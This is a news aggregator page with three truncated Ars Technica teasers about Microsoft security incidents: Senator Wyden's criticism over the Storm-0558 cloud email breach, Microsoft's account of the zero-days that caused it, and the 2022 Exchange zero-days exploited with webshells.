• chevron_right

      US senator blasts Microsoft for “negligent cybersecurity practices”

      news.movim.eu / ArsTechnica · Thursday, 27 July, 2023 - 20:29

    US senator blasts Microsoft for “negligent cybersecurity practices”

    Enlarge (credit: Getty Images)

    A US senator is calling on the Justice Department to hold Microsoft responsible for “negligent cybersecurity practices” that enabled Chinese espionage hackers to steal hundreds of thousands of emails from cloud customers, including officials in the US Departments of State and Commerce.

    “Holding Microsoft responsible for its negligence will require a whole-of-government effort,” Ron Wyden (D-Ore.) wrote in a letter . It was sent on Thursday to the heads of the Justice Department, Cybersecurity and Infrastructure Security Agency, and the Federal Trade Commission.

    Bending over backward

    Wyden’s remarks echo those of other critics who say Microsoft is withholding key details about a recent hack. In disclosures involving the incident so far, Microsoft has bent over backwards to avoid saying its infrastructure—including the Azure Active Directory , a supposedly fortified part of Microsoft’s cloud offerings that large organizations use to manage single sign-on and multifactor authentication—was breached. The critics have said that details Microsoft has disclosed so far lead to the inescapable conclusion that vulnerabilities in code for Azure AD and other cloud offerings were exploited to pull off the successful hack.

    Read 13 remaining paragraphs | Comments

    • chevron_right

      Microsoft takes pains to obscure role in 0-days that caused email breach

      news.movim.eu / ArsTechnica · Friday, 14 July, 2023 - 22:19 · 1 minute

    Microsoft takes pains to obscure role in 0-days that caused email breach

    Enlarge (credit: Getty Images | Aurich Lawson)

    On Friday, Microsoft attempted to explain the cause of a breach that gave hackers working for the Chinese government access to the email accounts of 25 of its customers—reportedly including the US Departments of State and Commerce and other sensitive organizations.

    In a post on Friday , the company indicated that the compromise resulted from three exploited vulnerabilities in either its Exchange Online email service or Azure Active Directory , an identity service that manages single sign-on and multifactor authentication for large organizations. Microsoft’s Threat Intelligence team said that Storm-0558, a China-based hacking outfit that conducts espionage on behalf of that country’s government, exploited them starting on May 15. Microsoft drove out the attackers on June 16 after a customer tipped off company researchers of the intrusion.

    Above all else: Avoid the Z-word

    In standard parlance among security professionals, this means that Storm-0558 exploited zero-days in the Microsoft cloud services. A “zero-day” is a vulnerability that is known to or exploited by outsiders before the vendor has a patch for it. “Exploit” means using code or other means to trigger a vulnerability in a way that causes harm to the vendor or others.

    Read 13 remaining paragraphs | Comments

    • chevron_right

      High-severity Microsoft Exchange 0-day under attack threatens 220,000 servers

      news.movim.eu / ArsTechnica · Friday, 30 September, 2022 - 20:01

    The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

    Enlarge (credit: Getty Images )

    Microsoft late Thursday confirmed the existence of two critical vulnerabilities in its Exchange application that have already compromised multiple servers and pose a serious risk to an estimated 220,000 more around the world.

    The currently unpatched security flaws have been under active exploit since early August, when Vietnam-based security firm GTSC discovered customer networks had been infected with malicious webshells and that the initial entry point was some sort of Exchange vulnerability. The mystery exploit looked almost identical to an Exchange zero-day from 2021 called ProxyShell, but the customers’ servers had all been patched against the vulnerability, which is tracked as CVE-2021-34473. Eventually, the researchers discovered the unknown hackers were exploiting a new Exchange vulnerability.

    Webshells, backdoors, and fake sites

    “After successfully mastering the exploit, we recorded attacks to collect information and create a foothold in the victim's system,” the researchers wrote in a post published on Wednesday . “The attack team also used various techniques to create backdoors on the affected system and perform lateral movements to other servers in the system.”

    Read 9 remaining paragraphs | Comments